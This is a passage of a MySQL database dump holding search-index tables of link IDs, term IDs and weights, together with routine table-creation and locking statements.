3,45279,3.00993),(123,45280,1.14331),(123,45281,1.12),(123,45282,1.09669),(123,45283,0.91),(123,45284,1.02669),(123,45285,0.86331),(123,45286,1.00331),(123,45287,0.88669),(123,45288,1.02669),(123,45289,1.07331),(123,45290,1.28331),(123,45291,0.98),(123,45292,1.16669),(123,45293,0.93331),(123,45294,1.19),(123,45295,0.91),(123,45296,1.07331),(123,45297,0.95669),(123,45298,1.02669),(123,45299,0.93331),(123,45300,1.00331),(123,45301,1.14331),(123,45302,1.77338),(123,45303,1.00331),(123,45304,1.07331),(123,45305,0.93331),(123,45306,0.98),(123,45307,0.98),(123,45308,0.91),(123,45309,0.98),(123,45310,0.91),(123,45311,1.02669),(123,45312,1.14331),(123,45313,0.93331),(123,45314,1.09669),(123,45315,0.23331),(123,45316,1.00331),(123,45317,1.07331),(123,45318,0.93331),(123,45319,1.00331),(123,45320,0.91),(123,45321,0.98),(123,45322,2.1),(123,45323,1.07331),(123,45324,1.16669),(123,45325,0.98),(123,45326,1.14331),(123,45327,1.00331),(123,45328,1.00331),(123,45329,1.12),(123,45330,0.28),(123,45331,1.02669),(123,45332,1.09669),(123,45333,0.98),(123,45334,1.14331),(123,45335,0.86331),(123,45336,0.98),(123,45337,0.91),(123,45338,1.07331),(123,45339,0.95669),(123,45340,0.98),(123,45341,2.47338),(123,45342,2.38),(123,45343,1.00331),(123,45344,1.00331),(123,45345,1.21331),(123,45346,0.18669),(123,45347,1.05),(123,45348,1.09669),(123,45349,0.28),(123,45350,0.93331),(123,45351,1.02669),(123,45352,0.23331),(123,45353,0.95669),(123,45354,1.14331),(123,45355,0.18669),(123,45356,0.88669),(123,45357,1.12),(123,45358,0.93331),(123,45359,1.14331),(123,45360,1.00331),(123,45361,1.21331),(126,47013,0.28),(128,47049,0.91),(125,47364,0.23331),(125,47365,1.02669),(125,47366,1.14331),(125,47622,0.98),(125,47623,1.12),(125,47624,0.88669),(125,47625,1.00331),(125,47626,0.81669),(125,47627,0.88669),(125,47628,0.81669),(125,47629,0.88669),(125,47630,1.00331),(125,47631,1.14331),(125,47632,1.09669),(125,47633,0.91),(125,47634,1.07331),(125,47635,0.95669),(125,47636,1.02669),(125,47637,1.09669),(125,47638,1.21331),(125,47639,0.93331),(125,47640,1.12),(125,48061,0.93331),(125,48062,1.00331),(125,48063,0.86331),(125,48064,1.00331),(125,48065,0.88669),(125,48066,1.02669),(125,48067,0.88669),(125,48068,1.02669),(125,48069,0.93331),(125,48070,1.05),(125,48071,1.05),(125,48072,1.19),(125,48073,0.93331),(125,48074,1.05),(125,48075,1.00331),(125,48076,1.21331),(125,48077,0.95669),(125,48078,1.07331),(125,48079,0.93331),(125,48080,1.00331),(125,48081,1.00331),(133,48081,1.00331),(125,48082,1.09669),(125,48083,0.95669),(125,48084,0.88669),(126,48084,0.88669),(125,48085,0.93331),(125,48086,0.93331),(125,48087,1.02669),(125,48088,0.95669),(125,48089,1.02669),(125,48090,0.93331),(125,48091,1.00331),(125,48092,1.12),(125,48093,1.00331),(125,48094,1.07331),(125,48095,0.98),(125,48096,1.12),(125,48097,1.00331),(125,48098,0.95669),(125,48099,1.05),(125,48100,1.02669),(125,48101,1.14331),(125,48102,0.95669),(125,48103,0.88669),(125,48104,0.98),(125,48105,0.88669),(125,48106,1.05),(125,48107,2.73),(125,48108,1.91338),(125,48109,0.98),(125,48110,1.00331),(125,48111,1.07331),(125,48112,0.95669),(125,48113,1.07331),(125,48114,1.26),(125,48115,0.91),(125,48116,1.02669),(125,48117,0.88669),(125,48118,0.93331),(125,48119,0.86331),(125,48120,0.95669),(125,48121,0.95669),(125,48122,1.02669),(125,48123,0.84),(125,48124,0.91),(125,48125,1.77338),(125,48126,0.86331),(125,48127,0.95669),(125,48128,1.82),(125,48129,0.93331),(125,48130,0.86331),(125,48131,1.07331),(125,48132,0.93331),(125,48133,0.98),(125,48134,0.81669),(125,48135,0.93331),(125,48136,1.05),(125,48137,0.93331),(125,48138,0.98),(125,48139,1.00331),(125,48140,0.91),(125,48141,1.05),(125,48142,0.84),(125,48143,0.95669),(125,48144,0.23331),(125,48145,0.86331),(125,48146,0.98),(125,48147,0.18669),(125,48148,0.86331),(125,48149,1.00331),(125,48150,0.28),(125,48151,1.02669),(125,48152,1.09669),(125,48153,0.65338),(125,48154,1.05),(125,48155,1.16669),(125,48156,0.95669),(125,48157,1.00331),(125,48158,0.98),(125,48159,1.19),(125,48160,1.02669),(126,48315,0.91),(126,48316,0.98),(126,48317,0.14),(126,48318,0.81669),(126,48319,1.02669),(126,48320,0.88669),(126,48321,0.98),(126,48556,0.28),(126,48557,0.98),(126,48558,1.09669),(126,48559,0.46669),(126,48560,1.09669),(126,48561,1.26),(126,48562,0.93331),(126,48563,1.02669),(126,48564,0.51331),(126,48565,1.00331),(126,48566,1.12),(126,48567,0.84),(126,48568,0.95669),(126,48569,0.88669),(126,48570,1.05),(126,48571,0.86331),(126,48572,0.98),(126,48573,1.02669),(126,48574,1.19),(126,48575,0.28),(126,48576,0.91),(126,48577,1.00331),(126,48578,0.95669),(126,48579,1.09669),(126,48580,0.37331),(126,48581,1.07331),(126,48582,1.26),(126,48583,0.93331),(126,48584,1.09669),(126,49103,0.88669),(126,49104,1.00331),(126,49105,0.86331),(126,49106,1.00331),(126,49107,0.91),(126,49108,1.14331),(126,49109,1.07331),(126,49110,0.69993),(126,49111,0.98),(126,49112,1.12),(126,49113,0.88669),(126,49114,0.98),(126,49115,0.91),(126,49116,1.12),(126,49117,0.93331),(126,49118,1.05),(126,49119,0.98),(126,49120,1.07331),(126,49121,0.95669),(126,49122,0.88669),(126,49123,1.00331),(126,49124,0.95669),(126,49125,1.09669),(126,49126,0.88669),(126,49127,0.95669),(126,49128,0.88669),(126,49129,0.98),(126,49130,1.14331),(126,49131,0.93331),(126,49132,1.07331),(126,49133,1.00331),(126,49134,1.09669),(126,49135,0.93331),(133,49135,0.93331),(126,49136,1.02669),(126,49137,1.91338),(126,49138,1.05),(126,49139,1.07331),(126,49140,0.95669),(126,49141,1.14331),(126,49142,1.96),(126,49143,1.14331),(126,49144,1.14331),(126,49145,0.95669),(126,49146,1.12),(126,49147,1.00331),(126,49148,1.07331),(126,49149,0.88669),(126,49150,0.98),(126,49151,0.93331),(126,49152,1.14331),(126,49153,1.00331),(126,49154,1.12),(126,49155,0.95669),(126,49156,1.09669),(126,49157,0.98),(126,49158,1.07331),(126,49159,0.98),(126,49160,1.12),(126,49161,0.95669),(126,49162,1.21331),(126,49163,0.95669),(126,49164,1.02669),(126,49165,0.91),(126,49166,1.07331),(126,49167,0.95669),(126,49168,1.07331),(126,49169,0.93331),(126,49170,1.12),(126,49171,0.56),(126,49172,0.95669),(126,49173,1.23669),(126,49174,1.02669),(126,49175,1.23669),(126,49176,1.05),(126,49177,1.21331),(126,49178,0.81669),(126,49179,0.88669),(126,49180,0.88669),(126,49181,0.93331),(126,49182,0.98),(126,49183,1.16669),(126,49184,0.88669),(126,49185,1.05),(126,49186,0.86331),(126,49187,0.93331),(126,49188,2.05338),(126,49189,0.88669),(126,49190,1.02669),(126,49191,0.14),(126,49192,1.00331),(126,49193,1.14331),(126,49194,0.86331),(126,49195,1.14331),(126,49196,0.95669),(126,49197,0.46669),(126,49198,1.00331),(126,49199,1.21331),(126,49200,0.95669),(126,49201,1.05),(126,49202,0.23331),(126,49203,0.88669),(126,49204,1.02669),(126,49205,0.95669),(126,49206,1.05),(126,49207,0.79331),(126,49208,0.86331),(126,49209,0.93331),(126,49210,1.02669),(126,49211,0.95669),(126,49212,1.09669),(128,49337,0.28),(128,51105,1.58662),(128,51106,0.93331),(128,51107,0.95669),(128,51108,4.2),(128,51109,1.26),(128,51110,1.14331),(128,51111,1.12),(128,51112,1.12),(128,51113,0.93331),(128,51114,0.98),(128,51115,0.88669),(128,51116,1.02669),(128,51117,0.91),(128,51118,0.98),(128,51121,0.77),(128,51122,0.91),(128,51123,0.86331),(128,51124,1.02669),(128,51125,0.21),(128,51126,0.93331),(128,51127,1.07331),(128,51306,1.07331),(128,51307,1.4),(128,51308,1.14331),(128,51309,1.4),(128,51310,0.46669),(128,51311,1.07331),(128,51312,1.21331),(128,51313,0.46669),(128,51314,1.07331),(128,51315,1.26),(128,51316,0.42),(128,51317,1.05),(128,51318,1.16669),(128,51319,0.91),(128,51320,0.95669),(128,51321,0.56),(128,51322,1.05),(128,51323,1.14331),(128,51324,0.42),(128,51325,1.02669),(128,51326,1.16669),(128,51327,1.82),(128,51328,1.00331),(128,51329,1.00331),(128,51800,0.93331),(128,51801,1.09669),(128,51802,0.46669),(128,51803,1.00331),(128,51804,1.19),(128,51805,1.00331),(128,51806,1.00331),(128,51807,1.12),(128,51808,1.00331),(128,51809,2.05338),(128,51810,0.98),(128,51811,1.05),(128,51812,0.93331),(128,51813,1.12),(128,51814,0.95669),(128,51815,1.19),(128,51816,1.05),(128,51817,1.19),(128,51818,0.91),(128,51819,1.05),(128,51820,0.84),(128,51821,0.98),(128,51822,0.84),(128,51823,1.00331),(128,51824,0.93331),(128,51825,1.02669),(128,51826,1.07331),(128,51827,0.81669),(128,51828,0.93331),(128,51829,0.98),(128,51830,0.88669),(128,51831,1.00331),(128,51832,0.37331),(128,51833,1.05),(128,51834,1.16669),(128,51835,0.98),(133,52428,0.18669),(133,52429,0.91),(133,52430,1.00331),(133,52431,0.98),(133,52432,1.05),(133,52433,0.51331),(133,52434,1.14331),(133,52435,1.33),(133,52436,0.42),(133,52437,0.98),(133,52438,1.07331),(133,52542,1.16669),(133,52543,1.26),(133,52544,0.93331),(133,52545,1.00331),(133,52546,1.05),(133,52547,1.09669),(133,52548,0.93331),(133,52549,1.07331),(133,52550,1.19),(133,52551,0.88669),(133,52552,1.05),(133,52553,1.05),(133,52554,1.16669),(133,52555,0.95669),(133,52556,1.23669),(133,52557,1.09669),(133,52558,1.37669),(133,52559,1.02669),(133,52560,1.19),(133,52561,0.98),(133,52562,1.05),(133,52563,0.95669),(133,52564,1.23669),(133,52565,1.07331),(133,52566,1.07331),(133,52567,1.14331),(134,52583,0.42),(134,52584,0.91),(134,52585,1.02669),(134,52621,0.37331),(134,52622,0.98),(134,52623,1.05),(134,52624,1.12),(134,52625,0.37331),(134,52626,0.98),(134,52627,1.02669),(134,52738,1.07331),(134,52739,0.91),(134,52740,1.16669),(134,52741,0.86331),(134,52742,1.00331),(134,52743,0.93331),(134,52744,1.26),(134,52745,1.00331),(134,52746,0.88669),(134,52747,1.07331),(134,52748,0.91),(134,52749,1.07331),(134,52750,0.93331),(134,52751,1.14331); /*!40000 ALTER TABLE `fit_finder_links_termse` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_termsf` -- DROP TABLE IF EXISTS `fit_finder_links_termsf`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_termsf` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_termsf` -- LOCK TABLES `fit_finder_links_termsf` WRITE; /*!40000 ALTER TABLE `fit_finder_links_termsf` DISABLE KEYS */; INSERT INTO `fit_finder_links_termsf` VALUES (5,421,0.23331),(5,422,0.98),(5,423,1.07331),(5,424,0.28),(5,425,1.12),(5,426,1.26),(116,574,0.02331),(118,574,0.02331),(119,574,0.02331),(9,574,0.04662),(103,574,0.04662),(9,575,1.72662),(9,576,0.95669),(9,577,0.93331),(121,578,0.0175),(9,578,0.035),(116,578,0.035),(120,578,0.035),(126,578,0.035),(110,578,0.0525),(103,578,0.07),(103,579,0.86331),(9,579,1.72662),(9,580,1.96),(9,581,0.32669),(35,581,0.65338),(9,582,0.98),(9,583,1.07331),(9,584,0.32669),(55,584,0.32669),(103,584,0.32669),(113,584,0.32669),(110,584,0.65338),(116,584,0.65338),(9,585,0.95669),(113,585,0.95669),(9,586,1.05),(9,587,0.02919),(112,587,0.02919),(113,587,0.02919),(117,587,0.02919),(120,587,0.02919),(123,587,0.02919),(126,587,0.02919),(110,587,0.05838),(9,588,0.95669),(9,589,1.05),(9,590,0.02331),(52,590,0.02331),(55,590,0.02331),(111,590,0.02331),(116,590,0.02331),(125,590,0.02331),(133,590,0.02331),(35,590,0.04662),(104,590,0.06993),(107,590,0.06993),(112,590,0.06993),(117,590,0.06993),(118,590,0.06993),(119,590,0.11655),(58,590,0.12321),(103,590,0.13986),(123,590,0.13986),(128,590,0.13986),(113,590,0.16317),(105,590,0.18648),(120,590,0.2331),(110,590,0.39627),(9,591,1.00331),(9,592,1.07331),(9,593,0.18669),(55,593,0.18669),(110,593,0.18669),(112,593,0.18669),(119,593,0.18669),(103,593,0.37338),(120,593,0.37338),(113,593,0.74676),(9,594,0.91),(9,595,1.00331),(105,1796,0.09331),(110,1796,0.09331),(116,1796,0.09331),(118,1796,0.09331),(125,1796,0.09331),(128,1796,0.09331),(112,1796,0.18662),(113,1796,0.18662),(35,1796,0.55986),(35,1805,0.86331),(35,1809,0.18669),(103,1809,0.18669),(105,1809,0.18669),(110,1809,0.18669),(112,1809,0.18669),(113,1809,0.18669),(120,1809,0.18669),(125,1809,0.18669),(126,1809,0.18669),(128,1809,0.18669),(104,1809,0.37338),(117,1809,0.74676),(35,9923,0.0175),(107,9923,0.0175),(110,9923,0.0175),(126,9923,0.0175),(134,9923,0.0175),(104,9923,0.07),(103,9923,0.0875),(117,9923,0.0875),(123,9923,0.0875),(125,9923,0.0875),(105,9923,0.105),(106,9923,0.105),(120,9923,0.14),(112,9923,0.1575),(119,9923,0.21),(35,9924,0.86331),(106,9924,0.86331),(123,9924,0.86331),(35,9925,1.00331),(35,9926,0.93331),(35,9927,1.00331),(35,9928,0.93331),(35,9929,1.00331),(35,9930,0.98),(35,9931,1.09669),(35,9932,1.02669),(35,9933,1.12),(35,9934,0.93331),(35,9935,0.86331),(35,9936,1.12),(35,9937,0.95669),(35,9938,1.16669),(35,9939,1.02669),(35,9940,1.28331),(35,9941,0.86331),(110,9941,0.86331),(117,9941,0.86331),(120,9941,0.86331),(35,9942,0.95669),(120,9942,0.95669),(35,9943,0.28),(35,9944,1.02669),(35,9945,1.09669),(35,9946,0.46662),(35,9947,0.98),(35,9948,1.28331),(35,9949,0.93331),(35,9950,1.09669),(35,9951,0.02331),(55,9951,0.02331),(103,9951,0.02331),(104,9951,0.02331),(107,9951,0.02331),(112,9951,0.02331),(117,9951,0.02331),(118,9951,0.02331),(119,9951,0.02331),(116,9951,0.04662),(125,9951,0.04662),(126,9951,0.04662),(68,9951,0.06993),(105,9951,0.06993),(113,9951,0.06993),(120,9951,0.11655),(110,9951,0.32634),(35,9952,1.05),(35,9953,1.14331),(35,9954,0.98),(35,9955,1.05),(35,9956,0.88669),(104,9956,0.88669),(116,9956,0.88669),(118,9956,0.88669),(120,9956,0.88669),(123,9956,0.88669),(113,9956,1.77338),(110,9956,6.20683),(35,9957,1.09669),(35,9958,0.04081),(110,9958,0.16324),(35,9959,1.05),(35,9960,1.14331),(35,9961,0.32669),(105,9961,0.32669),(126,9961,0.32669),(133,9961,0.32669),(107,9961,0.65338),(35,9962,1.05),(35,9963,1.16669),(113,10762,0.84),(105,10775,0.23331),(107,10775,0.23331),(116,10775,0.23331),(117,10775,0.23331),(120,10775,0.23331),(125,10775,0.23331),(103,10775,0.93324),(119,10775,0.93324),(40,10918,0.84),(123,10918,1.48),(40,10919,1.82),(40,10920,1.91338),(40,10921,1.00331),(40,10922,1.07331),(103,12262,0.14),(109,12262,0.14),(125,12262,0.14),(128,12262,0.14),(120,12262,0.28),(110,12262,0.42),(52,12262,0.74),(52,12263,4.81),(52,12264,5.92),(52,12265,0.91),(55,12265,0.91),(52,12266,1.07331),(55,12266,1.07331),(55,12476,1.02669),(55,12477,1.12),(55,12478,0.91),(55,12479,0.98),(55,12480,0.32669),(113,12480,0.98007),(120,12480,0.98007),(55,12481,1.00331),(55,12482,1.07331),(55,12483,0.86331),(55,12484,1.09669),(68,13697,0.02331),(110,13697,0.02331),(120,13697,0.02331),(68,13698,0.93331),(68,13699,1.00331),(112,13700,0.86331),(113,13700,0.86331),(116,13700,0.86331),(117,13700,0.86331),(126,13700,0.86331),(68,13700,1.72662),(105,13700,1.72662),(120,13700,1.72662),(125,13700,1.72662),(110,13700,6.04317),(68,13701,1.00331),(68,13702,0.98),(110,13702,0.98),(68,13703,1.02669),(68,13704,1.12),(117,14329,0.0175),(103,14329,0.035),(125,14329,0.0925),(120,14331,0.91),(112,14335,0.035),(126,14335,0.035),(107,14335,0.07),(110,14335,0.21),(126,14336,0.93331),(107,14336,1.86662),(103,18027,0.18669),(112,18027,0.18669),(125,18027,0.18669),(103,18028,0.88669),(112,18028,0.88669),(103,18029,0.95669),(112,18029,0.95669),(103,18030,0.32669),(119,18030,0.65338),(103,18031,0.95669),(103,18032,1.07331),(116,18033,0.86331),(119,18033,0.86331),(103,18033,1.72662),(103,18034,1.02669),(103,18035,0.95669),(112,18036,0.81669),(103,18036,1.63338),(123,18036,1.63338),(125,18036,2.45007),(103,18037,0.98),(103,18038,0.98),(103,18039,1.00331),(103,18040,1.07331),(103,18041,0.88669),(103,18042,0.95669),(103,18043,0.86331),(119,18043,0.86331),(120,18043,0.86331),(103,18044,0.98),(103,18045,0.28),(104,18045,0.28),(117,18045,0.28),(125,18045,0.28),(126,18045,0.28),(103,18046,0.95669),(103,18047,1.02669),(103,18048,0.86331),(103,18049,0.95669),(103,18050,0.91),(103,18051,1.09669),(103,18052,0.84),(116,18052,0.84),(103,18053,0.93331),(103,18054,0.95669),(103,18055,0.93331),(103,18056,1.12),(103,18057,0.95669),(103,18058,1.05),(103,18059,0.02331),(105,18059,0.02331),(117,18059,0.02331),(123,18059,0.02331),(125,18059,0.02331),(107,18059,0.04662),(119,18059,0.04662),(120,18059,0.06993),(103,18060,0.95669),(103,18061,1.09669),(103,18062,0.02331),(104,18062,0.02331),(107,18062,0.04662),(117,18062,0.11655),(120,18062,0.11655),(103,18063,1.00331),(103,18064,1.07331),(116,18065,0.02331),(117,18065,0.02331),(128,18065,0.02331),(106,18065,0.04662),(119,18065,0.04662),(125,18065,0.04662),(126,18065,0.04662),(112,18065,0.06993),(123,18065,0.06993),(103,18065,0.09324),(120,18065,0.09324),(103,18066,0.84),(112,18066,0.84),(119,18066,0.84),(125,18066,0.84),(103,18067,0.95669),(123,18068,0.88669),(103,18068,2.66007),(103,18069,1.00331),(103,18070,1.00331),(103,18071,1.00331),(103,18072,0.95669),(103,18073,1.07331),(103,18074,0.93331),(103,18075,1.09669),(103,18076,1.00331),(103,18077,1.21331),(103,18078,0.91),(105,18078,0.91),(107,18078,0.91),(103,18079,1.05),(103,18080,0.91),(103,18081,1.02669),(103,18082,0.18669),(103,18083,0.91),(103,18084,1.05),(112,18085,0.0175),(125,18085,0.0175),(103,18085,0.035),(104,18085,0.035),(107,18085,0.035),(123,18085,0.035),(105,18085,0.0525),(106,18085,0.0525),(118,18085,0.0525),(110,18085,0.07),(117,18085,0.0875),(120,18085,0.0875),(119,18085,0.1225),(103,18086,0.86331),(103,18087,1.00331),(103,18088,0.91),(103,18089,1.02669),(103,18090,0.81669),(103,18091,1.09669),(103,18092,0.86331),(103,18093,1.00331),(112,18094,0.18669),(103,18094,0.37338),(107,18094,0.37338),(103,18095,1.82),(103,18096,2.05338),(103,18097,0.91),(103,18098,0.98),(103,18099,0.28),(103,18100,0.93331),(103,18101,1.05),(103,18102,0.91),(103,18103,1.02669),(103,18104,0.86331),(112,18104,0.86331),(103,18105,1.02669),(103,18106,0.95669),(103,18107,1.05),(103,18108,0.93331),(103,18109,1.05),(103,18110,0.98),(103,18111,1.21331),(103,18112,0.95669),(103,18113,1.05),(103,18114,0.32669),(103,18115,0.98),(103,18116,1.09669),(103,18117,0.28),(103,18118,0.93331),(103,18119,1.00331),(103,18120,0.28),(103,18121,0.91),(103,18122,1.00331),(125,18123,0.18669),(103,18123,0.37338),(117,18123,0.37338),(103,18124,0.86331),(103,18125,1.02669),(103,18126,1.05),(103,18127,1.14331),(103,18128,0.86331),(103,18129,1.00331),(103,18130,0.86331),(103,18131,0.95669),(103,18132,0.65331),(110,18132,0.65331),(103,18133,1.09669),(103,18134,1.4),(103,18135,0.28),(103,18136,0.91),(103,18137,1.00331),(104,18138,0.02919),(110,18138,0.05838),(125,18138,0.05838),(103,18138,0.11676),(107,18138,0.11676),(126,18138,0.11676),(113,18138,0.14595),(103,18139,0.88669),(126,18139,1.77338),(103,18140,0.98),(103,18141,0.93331),(103,18142,1.05),(103,18143,0.91),(103,18144,1.02669),(103,18145,0.95669),(103,18146,1.02669),(103,18210,0.32669),(103,18211,0.95669),(103,18212,1.14331),(103,18213,0.18669),(103,18214,1.02669),(103,18215,1.14331),(103,18216,0.32669),(103,18217,1.02669),(103,18218,1.26),(104,19255,0.84),(104,19256,1.02669),(104,19257,0.93331),(104,19258,1.00331),(104,19259,0.93331),(104,19260,1.05),(104,19261,0.95669),(104,19262,1.12),(104,19263,1.05),(104,19264,1.16669),(104,19265,0.42),(119,19265,0.42),(104,19266,1.02669),(119,19266,1.02669),(104,19267,1.19),(104,19268,0.37338),(104,19269,1.00331),(104,19270,1.14331),(104,19271,0.86331),(104,19272,1.02669),(104,19273,0.84),(104,19274,0.91),(104,19275,0.95669),(104,19276,1.02669),(104,19277,0.86331),(120,19277,0.86331),(104,19278,1.00331),(104,19279,0.91),(104,19280,1.12),(104,19281,0.86331),(104,19282,0.98),(104,19283,0.88669),(104,19284,1.05),(104,19285,0.18669),(104,19286,0.93331),(104,19287,1.02669),(104,19288,0.28),(128,19288,0.28),(104,19289,0.91),(104,19290,0.98),(104,19291,0.93331),(104,19292,1.00331),(104,19293,0.98),(104,19294,1.09669),(104,19295,1.05),(104,19296,1.02669),(104,19297,1.07331),(104,19298,0.37331),(104,19299,1.00331),(104,19300,1.12),(104,19301,0.14),(105,19301,0.14),(116,19301,0.14),(117,19301,0.14),(123,19301,0.14),(104,19302,0.88669),(105,19302,0.88669),(117,19302,0.88669),(104,19303,0.95669),(105,19303,0.95669),(117,19303,0.95669),(119,20660,0.18669),(105,20660,0.37338),(105,20661,1.72662),(105,20662,0.93331),(105,20663,0.98),(105,20664,0.37331),(105,20665,0.95669),(105,20666,1.05),(105,20667,0.88669),(106,20667,0.88669),(105,20668,0.95669),(106,20668,0.95669),(105,20669,0.93331),(105,20670,1.00331),(105,20671,1.00331),(105,20672,1.07331),(105,20673,0.91),(105,20674,1.00331),(105,20675,0.88669),(117,20675,0.88669),(119,20675,0.88669),(105,20676,1.02669),(105,20677,0.86331),(105,20678,0.93331),(105,20679,0.51331),(105,20680,1.00331),(105,20681,1.05),(105,20682,0.37331),(105,20683,1.02669),(105,20684,1.19),(105,20685,0.23331),(105,20686,0.88669),(105,20687,1.00331),(105,20688,0.84),(105,20689,0.93331),(105,20690,0.23331),(105,20691,0.91),(105,20692,1.05),(105,20693,0.32669),(107,20693,0.65338),(105,20694,0.95669),(105,20695,1.05),(105,20696,0.93331),(105,20697,1.14331),(105,20698,0.18669),(120,20698,0.18669),(105,20699,0.86331),(105,20700,0.93331),(105,20701,1.07331),(105,20702,1.16669),(105,20703,0.02919),(117,20703,0.02919),(125,20703,0.02919),(126,20703,0.02919),(119,20703,0.05838),(110,20703,0.11676),(105,20704,0.98),(105,20705,1.09669),(105,20706,1.05),(105,20707,0.86331),(105,20708,0.91),(105,20709,0.88669),(110,20709,1.77338),(105,20710,0.98),(105,20711,0.88669),(105,20712,1.02669),(105,20713,0.28),(105,20714,1.00331),(105,20715,1.05),(105,20716,0.93331),(105,20717,1.16669),(105,20718,0.32669),(105,20719,1.09669),(105,20720,1.19),(105,20721,0.18669),(105,20722,0.93331),(105,20723,1.02669),(112,20724,0.84),(113,20724,0.84),(119,20724,0.84),(123,20724,0.84),(128,20724,0.84),(105,20724,1.68),(120,20724,2.52),(105,20725,1.02669),(105,20726,1.00331),(105,20727,0.95669),(105,20728,1.12),(105,20729,0.86331),(105,20730,1.07331),(105,20731,0.95669),(105,20732,1.07331),(105,20733,0.93331),(105,20734,1.12),(105,20735,0.93331),(128,20735,0.93331),(105,20736,1.09669),(128,20736,1.09669),(105,20737,0.93331),(105,20738,1.09669),(105,20739,0.23331),(105,20740,0.91),(105,20741,0.98),(105,20742,0.14),(105,20743,0.91),(105,20744,1.07331),(105,20745,1.12),(105,20746,1.16669),(106,20747,0.23331),(116,20747,0.23331),(118,20747,0.23331),(120,20747,0.23331),(123,20747,0.23331),(105,20747,0.46662),(105,20748,0.95669),(105,20749,1.23669),(105,20750,0.88669),(105,20751,0.98),(106,22062,0.95669),(106,22063,1.02669),(106,22064,0.98),(106,22065,1.05),(106,22066,0.88669),(106,22067,1.00331),(106,22068,0.88669),(106,22069,0.95669),(106,22070,1.05),(125,22071,0.18669),(117,22071,0.37338),(106,22071,0.56007),(106,22072,0.86331),(106,22073,1.07331),(106,22074,0.91),(106,22075,1.14331),(106,22076,0.91),(106,22077,1.05),(106,22078,0.65331),(106,22079,1.19),(106,22080,1.4),(106,22081,0.32669),(116,22081,0.32669),(117,22081,0.32669),(106,22082,0.98),(106,22083,1.19),(106,22084,0.32669),(116,22084,1.96014),(106,22085,1.02669),(106,22086,1.12),(106,22087,0.98),(106,22088,1.09669),(106,22089,0.91),(106,22090,1.00331),(106,22091,0.23331),(118,22091,0.23331),(125,22091,0.23331),(106,22092,0.95669),(106,22093,1.05),(106,22094,0.95669),(106,22095,1.07331),(106,22096,0.88669),(106,22097,1.12),(106,22098,0.88669),(106,22099,0.95669),(106,22100,0.60669),(106,22101,1.21331),(106,22102,1.30669),(119,22103,0.23331),(106,22103,0.46662),(106,22104,0.98),(106,22105,1.19),(106,22106,0.88669),(106,22107,0.98),(125,22108,0.23331),(116,22108,0.46662),(106,22108,1.39986),(128,22108,2.09979),(113,22108,3.26634),(106,22109,0.91),(106,22110,1.00331),(106,22111,0.88669),(128,22111,0.88669),(106,22112,1.02669),(106,22113,0.93331),(106,22114,1.00331),(106,22115,1.82),(106,22116,1.02669),(106,22117,1.02669),(106,22118,1.05),(106,22119,1.23669),(106,22120,0.42),(107,22120,0.42),(118,22120,0.42),(125,22120,0.42),(106,22121,1.14331),(106,22122,1.28331),(106,22123,0.46662),(106,22124,1.00331),(106,22125,1.09669),(106,22126,0.91),(106,22127,1.07331),(106,22128,1.05),(106,22129,1.12),(106,22130,0.42),(110,22130,0.84),(106,22131,1.09669),(106,22132,1.16669),(106,22133,0.56007),(106,22134,1.72662),(106,22135,0.91),(106,22136,0.98),(106,22137,0.88669),(106,22138,1.02669),(107,23009,0.93331),(112,23009,0.93331),(107,23010,1.09669),(112,23010,1.09669),(107,23011,2.00662),(107,23012,2.24),(107,23013,0.88669),(107,23014,1.00331),(107,23015,0.98),(107,23016,1.05),(107,23017,1.77338),(117,23017,1.77338),(107,23018,1.00331),(107,23019,1.00331),(107,23020,1.02669),(107,23021,0.91),(107,23022,1.09669),(107,23023,0.93331),(107,23024,0.98),(110,23025,0.23331),(112,23025,0.23331),(107,23025,0.46662),(107,23026,1.82),(107,23027,1.12),(107,23028,1.09669),(107,23029,1.82),(107,23030,1.96),(107,23031,1.02669),(107,23032,1.09669),(110,23033,0.91),(107,23033,1.82),(107,23034,2.05338),(107,23035,0.91),(107,23036,1.02669),(107,23037,2.14662),(107,23038,0.98),(107,23039,1.21331),(107,23040,1.86662),(107,23041,2.05338),(107,23042,0.88669),(126,23042,0.88669),(107,23043,0.95669),(107,23044,1.05),(107,23045,1.12),(107,23046,1.82),(107,23047,2.05338),(116,24225,1.05),(113,24227,0.28),(117,24227,0.28),(117,24238,0.91),(119,24238,0.91),(110,24244,0.98),(112,24258,0.84),(120,24269,0.23331),(116,24274,0.98),(116,24275,1.07331),(109,25061,0.86331),(109,25062,1.00331),(109,25063,0.46669),(109,25064,1.16669),(109,25065,1.28331),(110,29334,0.23331),(110,29335,0.91),(110,29336,1.05),(110,29337,0.46669),(110,29338,1.14331),(110,29339,1.21331),(110,29340,0.74662),(110,29341,1.02669),(110,29342,1.30669),(110,29343,1.26),(110,29344,1.33),(110,29345,0.88669),(110,29346,0.95669),(110,29347,0.84),(110,29348,0.91),(110,29349,0.86331),(110,29350,0.93331),(110,29351,0.88669),(110,29352,0.98),(110,29353,0.86331),(128,29353,0.86331),(110,29354,0.91),(110,29355,0.32669),(110,29356,0.93331),(110,29357,1.07331),(110,29358,1.00331),(110,29359,1.12),(110,29360,1.82),(110,29361,1.05),(110,29362,1.14331),(110,29363,0.23331),(110,29364,0.86331),(110,29365,0.98),(110,29366,0.93331),(110,29367,0.46669),(110,29368,1.02669),(110,29369,1.16669),(110,29370,1.07331),(110,29371,1.16669),(110,29372,1.07331),(110,29373,1.14331),(110,29374,1.07331),(110,29375,1.12),(110,29376,0.93331),(110,29377,1.05),(110,29378,0.37331),(110,29379,1.14331),(110,29380,1.21331),(110,29381,1.02669),(110,29382,1.09669),(110,29383,0.93331),(110,29384,1.02669),(110,29385,0.91),(117,29385,0.91),(110,29386,1.05),(110,29387,0.95669),(110,29388,1.09669),(110,29389,0.86331),(118,29389,0.86331),(110,29390,0.93331),(110,29391,1.12),(110,29392,1.05),(110,29393,0.91),(110,29394,1.00331),(110,29395,1.05),(110,29396,1.4),(110,29397,0.05838),(110,29398,1.07331),(110,29399,1.21331),(110,29400,1.09669),(110,29401,1.19),(110,29402,0.93331),(110,29403,1.02669),(110,29404,1.05),(110,29405,1.16669